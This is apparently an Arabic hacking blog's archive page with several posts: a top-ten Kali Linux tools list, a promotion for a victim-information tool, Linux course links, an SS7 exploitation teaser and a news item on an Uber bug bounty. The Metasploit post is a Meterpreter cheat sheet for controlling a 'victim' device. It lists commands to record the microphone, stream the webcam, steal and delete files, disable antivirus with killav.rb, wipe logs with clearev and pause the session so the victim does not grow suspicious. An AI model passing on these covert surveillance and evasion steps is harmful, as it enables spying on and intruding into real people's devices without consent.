‏إظهار الرسائل ذات التسميات اختراق. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات اختراق. إظهار كافة الرسائل

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux








لن نختلف صديقي ان بيئة انظمة لينكس هي الاكثر امانا والاكثر ملائمة لمختبري الإختراق و المطلعين على جديد المجال إجماعا ، ولن نختلف ايضا ان نظام الكالي لينكس هو اشهرها ،  لن اقول اقواها لا نريد حربا بالتعليقات ، فبالتأكيد يوجد انظمة لينكس أخرى مخصصة لإختبار الإختراق ، و سنستعرضها عليك في أحد الروابط الخارجية داخل هذا الموضوع ان اردت الإطلاع عليها أكثر .  في جميع الأحوال عزيزي المتابع، إخترنا لك في هذا المقال الإختراقي البسيط ، مجموعة من أشد التطبيقات و البرامج و الادوات فتكا في مجال الإختراق متوافرة في نظام الكالي لينكس ، إخترنا لك الكالي لينكس كونه نظام ربما يستخدمه العديد و العديد من محبي مجال الإختراق و الحماية ، كما يضم العديد من الأدوات ، خصوصا بعد تحديثه الأخير للنسخة 2017 التي ضمت ادوات جديدة أيضا . 



إعتمدنا في هذه القائمة ، على شهرة الأداة ، قوتها و أيضا رأي الخبراء الأمنيين ، استثنينا اي أداة مكررة او ضعيفة ، و قمنا بتعدادها لك كلها في 10 أدوات .  قراءة ممتعة . 






- SQLmap :

قائمة لأقوى 10 تطبيقات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها

وهل يخفي القمر ؟ ، اداة SQLmap اداة مفتوحة المصدر تم تصميمها بلغة البايثون ، الأداة لاختبار اختراق وكشف اوستغلال المواقع المصابة بثغرة SQLInjection ، والاستيلاء على المعلومات المتواجدة في قاعدة البيانات او كشفها و أحيانا حذفها ( في ثغرة الـ Blind SQLInjection ) ، تاتي الاداة بإمكانيات مميزة مثل فتح ملفات قواعد البيانات ، والوصول الى ملفات الموقع الاساسية ، وسحب البيانات ايضا من قواعد البيانات ، وبيانات المستخدمين ، وهي واحدة من أشهر الادوات استخداما ، تشير احصائيات الى ان اكثر من 27% من المواقع التي يتم إختراقها ، في الغالب يتم إختراقها بإستخدام ثغرة الـ SQLInjection .
إقرأ أيضا : إليك أزيد من 10 توزيعات لينكس (Linux) الخاصة بإختبار الإختراق

2 - Hydra : 

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها
تعتمد أداة الـ Hydra على الـ Password Attack ، او بمعنى ابسط تخمين كلمات السر ، تقوم الأداة بتخمين كلمات سر المواقع و الإيميلات و أيضا لوحات تحكم المواقع و غيرها حسب المطلوب ، تأتي أداة الهايدرا Hydra بكل من نسختي الـكونسول و الجرافيكية GUI ، لتسهل الأمر على المبتدئين في المجال أيضا ، تقوم الاداة بإختراق و كشف كلمات السر بإستخدام تقنية الـ Bruteforce ، و يمكنك الإنتقال و الإشتغال على مجموعة من البروتوكولات مثل SMTP لكشف كلمات السر الخاصة بالإيميلات او Http الخاصة بإكتشاف كلمات السر للمواقع و لوحات التحكم للمواقع و غيرها ، و هي حقا من أقوى أدوات إختراق كلمات السر الموجودة في نظام الـ Kali Linux . 

3 - Nmap : 

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها
أداة Nmap تم إطلاق اول إصدار لها سنة 1997 اي قبل 20 سنة من الآن ، تمت برمجتها بلغة بايثون ، C ، ++C و أيضا لغة Lua ، الأداة متوافقة مع جميع انظمة التشغيل تقريبا و يمكن تشغيلها على الويندوز أيضا او اي نظام لينكس غير الكالي ، تم تصميم الـ Nmap من أجل فحص و كشف الشبكات و تجريدها و حتى مراقبة حركات المستخدمين لتلك الشبكة ، والاجهزة المتصلة على الشبكة ، وتقوم ايضا بالبحث عن اي بورتات مفتوحة بألاجهزة المتصلة بالشبكة ، وتسمح لك ايضا بقطع النت عن اي متصل معك بالشبكة ، وكما انه يوجد واجهة رسومية خاصة بالاداة ، تدعى Zenmap ، بكل إختصار ، إن هذه الأداة تمكنك من التحكم الكامل في أي شبكة تريد . 

4 -  Aircrack-ng :

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها
أداة Aircrack-ng ، هي بحد ذاتها عبارة عن مجموعة أدوات ، هدفها الرئيسي إختبار إختراق شبكات الـ Wifi ، تمكن الاداة بفعل ذلك بمجموعة من الطرق ، منها التخمين و اخرى فك تشفير كلمات السر و بعضها عن تجميع الـ ivs و أحيانا الـ Bruteforce و العديد من الطرق ، الأداة متوافقة مع جميع الأنظمة تقريبا ، حتى انه يمكنك استخدامها على جهازك الأندرويد ، كما أن الأداة اثبتت قوتها في اختراق الشبكات من نوع WPA/WAP-PSK2 ، و هي بالتأكيد تستحق ان تكون معنا في هذه القائمة . 

5 - Burp Suite : 

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها
أداة الـ Burp Suite ، أداة قوية جدا بكشف ثغرات تطبيقات ومواقع الويب بشكل يدوي ، الأداة مصممة بلغة الجافا من قبل فريق PortSwigger Security ، يوجد إصدارين لهذه الأداة ، إصدار مجاني ، وإصدار مدفوع بقيمة 349$ . 
بالطبع النسخة المدفوعة تحتوي على الكثير والكثير من الميزات الإحترافية ، الجدير بالذكر انه تم اكتشاف العديد من الثغرات الأمنية في مواقع عملاقة مثل غوغل و تويتر وفيسبوك باستخدام هذه الإداة . 

6 -  Metasploit Framework :

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها
الميتا سبلويت ، واحدة من اشهر واقوى المنصات مفتوحة المصدر المستخدمة في مجال الإختراق و إختبار الإختراق في العالم ، تم برمجتها بالإعتماد على لغة البرمجة Ruby سنة 2014 ، هو مشروع ضخم يضم مجموعة من الادوات و البرامج و التطبيقات التي تهتم بالأمن المعلوماتي و كشف الثغرات الأمنية و إستغلالها، يحتوي المشروع اكثر من 1577 اداة تستطيع كشف الثغرات في مختلف أنظمة التشغيل و المواقع و الأجهزة أيضا ، كما تحتوي على أدوات تساعد على أختراق الاجهزة عبر الـ Payload ، ببساطة ، إنها الحزمة الكامل للهاكرز و المخترقين . 

7 - John the Ripper : 

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها

أداة john هي واحدة من أقوى و أشهر الأدوات المخصصة لفك تشفير كلمات السر ، كانت في بداياتها مخصصة فقط لأنظمة اللينكس قبل ان يتم تطويرها لتشتغل على مختلف المنصات و الأنظمة ،تقوم الأداة بتحديد التشفير الخاص لأي كلمة سر و تقوم بكسره و فك تشفيره ، الجميل في الأداة انه يمكنها تشفير اي كود حتى لو لم تكن تعرف نوعية التشفير ، إذ تقوم بالمرور بالتسلسل على جميع انواع التشفير حتى تجد المناسب لذلك الكود المشفر ، الجدير بالذكر ان أداة john the Rippe تأتي أيضا بواجهة رسومية لمساعدة المستخدم وتسهيل الأمور عليه .

8 - Webscarab : 

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها
أداة webscarab ،تم برمجة الأداة بإستخدام لغة الجافا و تم إطلاقها سنة 2013 ، و هي أداة مفتوحة المصدر و يمكنك التعديل عليها او تطويرها ان كنت مبرمجا من قبل ، تم صناعتها من طرف فريق ( OWASP) ، الأداة ببساطة تقوم بإنشاء بروكسي بينك وبين الموقع ، وتعديل البيانات التي ارسلتها ، كما تقوم ايضا بتسجل كل حركاتك على المتصفح ، ويمكنك ربطها بالعديد من المتصفحات مثل فايرفوكس و chrome والعديد .

9 -  Maltego :

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها
أداة Maltego ، أداة مبنية على لغة البرمجة الجافا و متوافقة تقريبا مع جميع أنظمة التشغيل التي تعرفها ، ببساطة شديدة و لنشرح لك أكثر هدف الأداة ، كم مرة بحثت في جوجل عن إسمك ؟ أو إسم اي شخص تريد جلب معلومات عنه ؟ أداة Maltego مخصصة لجلب أكبر كمية من المعلومات عن الضحية ، ستنصدم و تفاجئ بكمية المعلومات التي تستطيع أداة Maltego توفيرها لك على طبق من ذهب ، من مكان زياراته و حساباته على التواصل الإجتماعي ، ترتكز في أساسها على مبدأ الـ Big Data ،، و تعتبر اقوى اداة استخراج و تجميع المعلومات حتى الآن .

10 - Wireshark : 

قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها
أداة Wireshark ، اداة صممت عام 1998 تمت انشاؤها بواسطة المبدع جيرالد كومبز ، اما اللغة المستخدمة فكانت C و ++C ، كان اسمها الاساسي Ethereal لكن تم تغييره عام 2006 بسبب مشاكل في اختيار العلامة التجارية ، تعتبر واحدة من أدوات الإختراق الداخلي ، ونعني بالإختراق الداخلي إختراق الشبكات محلية ، هدف الأداة الرئيسي هو الإستماع و التصنت على البيانات التي يتم تمريرها في الشبكة ، فإن إستخدمت الـ Wireshark و انا متصل بشبكة Wifi ، فيمكنني التجسس على كل المواقع و الملفات و كل شيئ يتم تداوله ضمن تلك الشبكة ، صحيح ان كل شيئ سيمر من أمام عينيك بشكل مشفر ، لكن يمكنك لاحقا فك تشفيره . الأداة متوافرة أيضا في نظم عدة .

شرح اداة mr.killer لفحص المواقع وجلب معلومات عن الضحية عن طريق رابط او بروكسي



السلام عليكم شباب معنا اليوم اداه ME.Killer "من صنع المهندس صوفي 



لتحميل الاداه اسفل الفيديو واما الان مع الشرح


واما الان مع التحميل 


اذا كنت تريد تثبيتها من تيرميكس حمل من هنا

واذا كنت تريد تثبيتها من توزيعه لينكس حملها من هنا 


ستجد داخل ملف التكست الاوامر الخاصه بتثبيت الاداه 

كورسات انظمه التشغيل (لينكس) كامله مجانا 2019 الجزء الاول

السلام عليكم ورحمه الله وبركاته اهلا اعزائي المتابعين في موضوع جديد وشيق وهو كورسات لينكس كامله مجانا وبلغه العربيه 



اولا كورس تعليم اوبنتو :-

  •  عدد الدروس : 16
  •  اللغة : عربي
  •  مقدم الكورس : محمد السعيد
  •  تقييم الكورس : 4 / 5 
        

من هنا  


مقدمه عن الكورس





 Linux Command Prompt ثانيا كورس 

  •  عدد الدروس : 40
  •  اللغة : عربي
  •  مقدم الكورس : عبد الرحمن عزت
  •  تقييم الكورس : 4 / 5 
        

المقدمة 



 توزيعة أوبنتو - Ubuntu  ثالثا كورس


 معلومات الكورس
  •  المادة : Linux
  •  عدد الدروس : 26
  •  اللغة : عربي
  •  مقدم الكورس : Mjma3 | المجمع
 تقييم الكورس
4 / 5
    
 قام بتقييم الكورس 3 عضو

فيديو المقدمه 


الكورس من   هنا

 رابعاً دورة اوبنتو 15.04 لينكس للمبتدئين


 معلومات الكورس
  •  المادة : Linux
  •  عدد الدروس : 13
  •  اللغة : عربي
  •  مقدم الكورس : Fadi AlAswadi
 تقييم الكورس
3 / 5
    
 قام بتقييم الكورس 9 عضو
 وصف الكورس
دورة مبسطة للمبتدئين في اوبنتو لينكس لكل شخص جديد ويريد ان يتعلم استخدام نظام تشغيل اخر غير الويندوزوتهئيك هذة الدورة من الانتقال من المستخدم العادي لانظمة التشغيل الى المستخدم المحترف الذي يعرف ماذا يجري وراء الكواليس بالحاسوب....


المقدمه 

والي الكورس من هنا

 Linux Tutorial for Beginners Playlist خامساً


 معلومات الكورس
  •  المادة : Linux
  •  عدد الدروس : 23
  •  اللغة : English
  •  مقدم الكورس : thenewboston
 تقييم الكورس
3 / 5
    
 قام بتقييم الكورس 3 عضو
  • المقدمه 
  •  وللذهاب الي الكورس من هنا 
 والي اللقاء الي الجزء الثاني من الكورسات 





10- أوامر التحكم بجهاز الضحية في metasploit-framework |الجنرال للمعلوميات تك



   أوامر التحكم والتجسس في جهاز الضحية:
             --------------------------------------------
لأعادة تشغيل جهاز الضحية : reboot
------------------------------------------------------------
 لاطفاء جهاز الضحية : shutdown
------------------------------------------------------------
 لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة  : sysinfo
------------------------------------------------------------
 لألتقاط صورة من شاشة الضحية : screenshot
------------------------------------------------------------
 لاضهار اتصلات الشبكة وجميع البرامج و الملفات المتصلة بالانترنت و مستهلكة للانترنت : netstat
------------------------------------------------------------
 للدخول الي الملفات الداخليه و كتابة الاوامر كأنك في جهاز الضحية : shell
------------------------------------------------------------
لاقلاع اي برنامج علي جهاز الضحية بامر واحد منك : execute -f mc.apk
طبعا غير mc الي اسم البرنامج الذي تريده ان يشتغل 
------------------------------------------------------------
لاضهار جميع البرامج التي تشتغل في جهاز الضحية اكتب : ps
------------------------------------------------------------
 لرفع اي ملف من عندك الي جهاز الضحية : مثال : upload /sdcard/doda.apk \doda.apk
استبدل doda باسم الملف او التطبيق او اي شئ تريد رفعه
طبعا هذا بعد الدخول الي مكان التطبيق او الصوره او اي شئ وطبعا لدخول اللي ملفات الضحيه اطلب الامر
cd /sdcard
------------------------------------------------------------
 لتحميل اي ملف او صورة ... من جهاز الضحية الي جهازك : download doda.apk
غير doda الي اسم الملف و ايضا صيغة apk الي صيغة الملف
طبعا هذا بعد الدخول الي مكان التطبيق او الصوره او اي شئ وطبعا لدخول اللي ملفات الضحيه اطلب الامر
cd /sdcard
------------------------------------------------------------
اوامر مهمه
اولا هذا الامر
بعد دخولك مباشر علي الضحيه cd /sdcard
sdcard : هذا مكان الذاكره الداخليه
اما اذا طلبت cd /sdcard1
sdcard1: هذا مكان الذاكره الخارجيه
اما معني cd
هذا الامر للتنقل بين الملفات : cd
يمكنك ان تكتب  .. cd  للرجوع الي الوراء
وايضا للدخول لملف cd file للذهاب و تنقل الي ملف اخر
قم باستبدال file ب اسم الملف الذي تريد ذهاب اليه
اما هذا الامر pwd هذا يبين لك اسم المكان الذي تتواجد به من البدايه للنهايه
مثال ...\...\...\...\...\
وايضا هذا الامر ls يظهر لك الملفات الموجودة و اين انت
وايضا Ctrl+l هذا لمسح الكلام الذي يتواجد في الشاشه

------------------------------------------------------------
هذا الامر لحذف اي ملف : rm doda
قم باستبدال doda الي الملف او برنامج او صورة الذي تريد ان تحذفها
------------------------------------------------------------ 
لاغلاق الجلسة الاختراق لفترة معينة من الزمن طبعا هذا مهم حتي لا يشك الضحية ... : sleep 5
غير 5 الي عدد التواني التي تحب فيها غلق جلسة الاختراق يمكنك وضع ساعة عن طريق كتابة 3600
3600 تانية = ساعة و هكذا
------------------------------------------------------------
لمسح سجل الاحدات و الاختراق (تفيد في الحماية) : clearev
------------------------------------------------------------
هذا الامر مفيد جدا دوره تعطيل جميع مضادات الفيروسات في جهاز الضحية : run killav.rb
------------------------------------------------------------
للتجسس علي مايك mic  الخاص بالضحية و سماع كل ما يقوله الضحية و كل ما صوت في غرفته :
record_mic -d 5
غير 5 الي  عدد الـتاوني الذي تريد تسجيل الصوت فيها متلا 60 يسجل كل ما يقوله الضحية لمدة دقيقة
طبعا الزمن بالتانية s
------------------------------------------------------------
لالتقاط صورة من كاميرا الجهاز : webcam_snap
------------------------------------------------------------
لمشاهدة كل ما يفعله الضحية من الكاميرا اي التجسس علي الكاميرا : webcam_stream -d 60
غير 60 الي عدد التواني التي تسجل فيه الكاميرا
يمكنك وضع 3600 حيت يسجل كل ما يفعله الضحية لمدة ساعة
و ايضا سيفتح صفحة في متصفحك لرؤية كل ما يفعله
--------------------------------------------------------------
معلومه مهمه اذا حملت اي شئ من عند الضحيه سيكون متواجد في ملف اداه metasploit الذي متواجد في termux ويمكنك نقل كل شئ قمت بتحميله من ملف metasploit الي الذاكره الداخليه الخاصه بك بهذا الامر
mv doda /sdcard
غير اسم doda باسم الملف او البرنامج او الصوره او اي شئ قمت بتحميله

استغلال ثغرة برتوكول ss7




اولا قبل ان تشاهد الشرح .
ملاحظة :شركة الجنرال للمعلوميات تك غير مسؤلة عن اي استخدام يضر المسلمين او يضر اي شخص ما نحن نخلي مسؤليتنا من الاستخدام الخطأ وشكرا لكم لحسن تعوانكم معنا 

كيفية استغلال ثغرة برتوكول ss7 حصريا علي قناة الجنرال للمعلوميات تك 🖤اذا عجبك ماتبخل بشير ولايك واشتراك في القناه لان في شروحات هنزلها قريب🖤


الي الشرح

مع تحيات :الجنرال للمعلوميات تك

اختراق Uber والتمكن من ايجاد ثغرة لاستخدام الخدمة مجانا ومدى الحياة

من الشركات المعروفة عالميا في خدمات التاكسي هي شركة اوبر، ولعل ما يؤكد ذلك هو وجودها في العديد من دول العالم، ومنها حتى المغرب و مصر. ورغم ان الشركة كان لديها اسبوع عصيب نوعا ما، بعد ان انتشر فيديو على  لمدير الشركة وهو يتجادل مع احد سائقي الخدمة، تمكنوا من تنفس الصعداء قليلا بعد  Uber من طرف هاكر هندي الذي كشف عن ثغرة مهمة للشركة و التي كافأته عن مجهوداته.

الهاكر و تفاصيل ثغرة اختراق Uber


اخترق Uber
الهاكر اسمه الحقيقي هو Anand Prakash، وهو مهندس امني، والذي وجد طريقة ذكية من اختراق Uber والحصول على خدمة التوصيل بدون دفع اي مال، ومدى الحياة، كما انها تعمل في جميع انحاء العالم.
ويقول anand صاحب موقع الكتروني متخصص في حماية تطبيقات الويب، انه وجد ثغرة “سهلة”، ويضيف ” كنت اتصفح تطبيق الخدمة من اجل ايجاد اية ثغرات محتملة داخل الخدمة، وهذا ما استطعت التوصل اليه”، ويضيف ” لقد كانت سهلة كثيرة للاستغلال، حيث انها تمكن المهاجمين من الاستفادة من الخدمة مجانا”.
حيث انه عند ارسال طلب توصيلة، تمكن الهاكر من تجنب خطوة الدفع، عبر استغلال ثغرة في الكود عند اختيار الدفع نقدا، كما يبين في الفيديو التالي :

“يمكن لاي شخص ان ينشأ حسابا في موقع Uber، ويبدأ في استخدام الخدمة كما يشاء، لكن عبر اختيار وسيلة دفع غير صالحة، فعندها يمكن لأي شخص ان يستفيد من الخدمة مجانا” يقول الهاكر.
وقد تمكن صاحب الثغرة من تبيانها للفريق عبر استغلالها والاستفادة من الخدمة في دولتي الولايات المتحدة، والهند، وبعدها تم سد الثغرة و اعطاء جائزة مالية له تقدر ب 13 الف دولار عبر برنامج bug bounty hunters، والتي تهدف الى تشجيع الهاكرز اصحاب القبعات البيضاء الذين يتمكنون من اختراق Uber وايجاد ثغرات مهمة فيه.
اختراق Uber
كما ان Anand هو ايضا معروف لكونه هاكر اخلاقي، حيث انه تمكن سابقا من الكشف عن ثغرة مهمة في فيسبوك التي تمكنه من تغيير كلمة المرور دون علم الضحية، كما انه اكتشف ثغرة في خدمة Domino’s تمكنه من طلب اي بيتزا مجانا، ويضيف انه تمكن من العيش فقط من خلال ايجاد الثغرات الكبيرة في المواقع المهمة، واستقبال مبالغ طائلة عنها.